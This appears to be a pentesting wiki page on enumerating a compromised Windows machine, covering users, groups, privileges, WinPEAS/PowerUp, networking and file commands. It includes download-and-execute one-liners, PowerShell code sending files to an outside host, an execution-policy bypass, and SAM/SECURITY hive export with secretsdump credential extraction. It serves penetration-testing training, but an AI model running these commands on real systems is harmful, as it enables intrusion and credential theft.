Local Enumeration

Get information about a compromised machine from the to find possible ways to escalate privileges

For enumeration of network protocols like SMB, RPC, or LDAP, see Enumeration.

Users

Users are important to understand on a computer or domain because they might have different or higher permissions than your current user. By understanding exactly how the users relate to each other and how privileges can be abused, you can quickly escalate privileges to reach the crown jewels.

For domain users/groups, BloodHound can enumerate and analyze all the connections between them for a better understanding, and possible privilege escalation methods.

Current User

The whoami command can tell you what user you are running as, as well as some more detailed information about privileges and groups, using the /all flag:

whoami /all

First comes simply the username, and their SID. The part before the \ tells you where the user comes from. If this is the same as the output for the hostname command, it is a local user on that computer.

USER INFORMATION
----------------

User Name        SID
================ ==============================================
WORKSTATION\user S-1-5-21-5386719015-7638691639-2457330780-1001

Next is the group information containing all the groups you are in. Some default ones you will always find here, but others have interesting properties. Like BUILTIN\Remote Desktop Users which allows logging in via RDP (port 3389), or custom groups that have a long SID.

You will also always find the Mandatory Label\..., called "Integrity level". It is used as a base for what actions you can and can't do. It may have one of the following values:

  1. System: SYSTEM (kernel, ...)

  2. High: Elevated users (Administrators, with "Run as Administrator")

  3. Medium: Standard users (default, most often seen)

  4. Low: Restricted rights often used in sandboxed processes or for directories storing temporary data

  5. Untrusted: Lowest integrity level with extremely limited access rights for processes or objects that pose the most potential risk

GROUP INFORMATION
-----------------

Group Name                           Type             SID                                            Attributes
==================================== ================ ============================================== ==================================================
Everyone                             Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
WORKSTATION\group                    Alias            S-1-5-21-5386719015-7638691639-2457330780-1008 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users         Alias            S-1-5-32-555                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

Lastly, there are the Privileges, which all have their own special thing that you are allowed to do with this privilege. Some privileges like SeImpersonatePrivilege can be abused.

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeSecurityPrivilege           Manage auditing and security log          Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Local Users/Groups

While looking at our own user is interesting, we should be looking at how we attack other users, and exactly who to attack. To get all local users on a computer, use Get-LocalUser in PowerShell:

PS C:\> Get-LocalUser

Name               Enabled Description
----               ------- -----------

Administrator      False   Built-in account for administering the computer/domain
user               True    
DefaultAccount     False   A user account managed by the system.
Guest              False   Built-in account for guest access to the computer/domain
WDAGUtilityAccount False   A user account managed and used by the system for Windows Defender Application Guard scen...

Users may be part of multiple Groups. There are many default groups windows uses, but custom ones can be made too. We can list them using Get-LocalGroup in PowerShell:

PS C:\> Get-LocalGroup

Name                                Description
----                                -----------

group
Access Control Assistance Operators Members of this group can remotely query authorization attributes and permission...
Administrators                      Administrators have complete and unrestricted access to the computer/domain
Backup Operators                    Backup Operators can override security restrictions for the sole purpose of back...
Cryptographic Operators             Members are authorized to perform cryptographic operations.
Device Owners                       Members of this group can change system-wide settings.
Distributed COM Users               Members are allowed to launch, activate and use Distributed COM objects on this ...
Event Log Readers                   Members of this group can read event logs from local machine
Guests                              Guests have the same access as members of the Users group by default, except for...
Hyper-V Administrators              Members of this group have complete and unrestricted access to all features of H...
IIS_IUSRS                           Built-in group used by Internet Information Services.
Network Configuration Operators     Members in this group can have some administrative privileges to manage configur...
Performance Log Users               Members of this group may schedule logging of performance counters, enable trace...
Performance Monitor Users           Members of this group can access performance counter data locally and remotely
Power Users                         Power Users are included for backwards compatibility and possess limited adminis...
Remote Desktop Users                Members in this group are granted the right to logon remotely
Remote Management Users             Members of this group can access WMI resources over management protocols (such a...
Replicator                          Supports file replication in a domain
System Managed Accounts Group       Members of this group are managed by the system.
Users                               Users are prevented from making accidental or intentional system-wide changes an...

Lastly, to learn who are the members of a group, we can use Get-LocalGroupMember:

PS C:\> Get-LocalGroupMember group

ObjectClass Name                  PrincipalSource
----------- ----                  ---------------
User        WORKSTATION\user      Local

Tip: Requesting this for theAdministrators group tells you who to target!

Domain Users/Groups

Local users/groups only work on one computer, but domain users/groups work on all domain-joined computers. To list all domain users, use the net user command with the /domain flag:

PS C:\> net user /domain

User accounts for \\DC1.corp.com
-------------------------------------------------------------------------------
Administrator            user1                     Guest
user2                    admin1                    admin2
krbtgt

There you find some default users like Administrator, Guest, and krbtgt, but also all other users on the domain. To get more detailed information about one user, include their name in the command:

PS C:\> net user "admin1" /domain

User name                    admin1 
Full Name
Comment
User's comment
...

Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins

These users can also be part of groups, which you can list. There are several default groups all with their own special group policies saying what they can and can't do. List them with net group:

PS C:\> net group /domain

Group Accounts for \\DC1.corp.com

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*Debug
*Development
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins

If we want to learn more about a custom group, or just see who is a member of the group, we can also include that group name in the command:

PS C:\> net group "Development" /domain

Group name     Development
Comment

Members
-------------------------------------------------------------------------------
user2

Useful Commands

This section contains a set of useful commands for CMD or PowerShell that you'll often look for while enumerating a compromised machine.

WinPEAS / PowerUp.ps1

Before doing manual enumeration, getting an idea of the system through automated means might be quicker. The WinPEAS script is a Windows equivalent to the well-known LinPEAS script for Linux. It enumerates many common misconfigurations in the system and tries to find vulnerabilities. This generates a lot of output to sift through, but it is a very useful output that normally would require a ton of manual work.

To run it, download the latest winPEASany.exe from the Releases page and download it from a local HTTP server if your target cannot access the public internet:

Run WinPEAS
cd /Windows/Tasks  # world-writable directory
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -o winPEASany.exe
.\winPEASany.exe | Tee-Object winPEAS.txt  # write output to a file (may take long)

Another such tool is PowerUp.ps1 which looks for more directly exploitable vulnerabilities and has commands to automatically exploit them too:

Run PowerUp.ps1
wget https://github.com/PowerShellMafia/PowerSploit/raw/master/Privesc/PowerUp.ps1 -o PowerUp.ps1
# It is a Module, and to import it we need to disable the execution policy
powershell -ep bypass
. .\PowerUp.ps1
# Now that it is imported into the current shell, we can run its commands
Invoke-PrivescAudit

Networking

nc -v $IP $PORT
Test-NetConnection -Port 22 10.10.10.10
nmap -p $PORTS $IP
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null

The above loop is very slow because it goes through ports one by one with a timeout

SMB: List shares on dc01
net view \\dc01 /all
Interactive netcat
dism /online /Enable-Feature /FeatureName:TelnetClient

telnet 10.10.10.10 25  # SMTP

This feature needs to be already enabled, or enabled by you as an administrator

wget $URL -O $FILE
iwr http://10.10.10.10/file.txt -o file.txt
curl $IP | sh
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/script.ps1');
nc $IP $PORT < $FILE
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect("10.10.10.10", 8000)
$writer = New-Object System.IO.StreamWriter($client.GetStream())
$bytes = (Get-Content -Encoding byte "C:\Windows\win.ini")
$writer.BaseStream.Write($bytes, 0, $bytes.Length)
$writer.Flush()

For larger file transfers, you can also do this over HTTP with python3 -m uploadserver:

curl.exe -X POST http://10.10.10.10:8000/upload -F 'files=@C:\Windows\win.ini'

Files

find
Get-ChildItem -File -Recurse -ErrorAction SilentlyContinue
# Or to get a nice tree view:
tree /F
grep -ri $PATTERN
dir -Recurse | Select-String -Pattern "password"
Check permissions
icacls C:\Path\To\DirOrFile
# Output reference: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/icacls#remarks
List disks (C:\, D:\, etc.)
wmic logicaldisk get deviceid,volumename,description

Stealing SAM / SYSTEM files

One interesting location to check is C:\Windows\System32\config\, where normally only administrators should be able to read contents. Permissions may be misconfigured or you may find the same files backed up in another readable place, but these should be interesting:

  • SAM - stores local cached credentials, known as SAM secrets

  • SECURITY - stores domain cached credentials, known as LSA secrets

  • SYSTEM - contains information to decrypt both SAM and LSA secrets above

On a running system, you often cannot copy these files directly because they are in use. With backups, this is not the case, but on a running system you can use reg to export them live:

Export from live system
reg save HKLM\SAM "C:\Windows\Temp\SAM"
reg save HKLM\SECURITY "C:\Windows\Temp\SECURITY"
reg save HKLM\SYSTEM "C:\Windows\Temp\SYSTEM"

When these three files, either copied directly or exported, are copied to your local machine, it is time to extract credentials from them. Using secretsdump.py it is possible to parse the three files like so:

Extract credentials
secretsdump.py -sam 'SAM' -security 'SECURITY' -system 'SYSTEM' LOCAL

Miscellaneous

history
Get-History
# Raw method below can bypass Clear-History
type (Get-PSReadlineOption).HistorySavePath
# Get verbose script block events (may be large)
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath "*[System[EventID=4104]]" | Export-Csv -Path 'ScriptBlockEvents.csv' -NoTypeInformation
Get ACEs from username
Import-Module .\PowerView.ps1
$sid = (get-domainuser j0r1an).objectsid
Get-ObjectACL | ? {$_.SecurityIdentifier -eq $sid} | select ObjectDN,ActiveDirectoryRights
Manage Services
# List all services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# Start/stop a service if you are allowed
net stop $SERVICE_NAME
net start $SERVICE_NAME

Living Off The Land (LOLBAS)

Last updated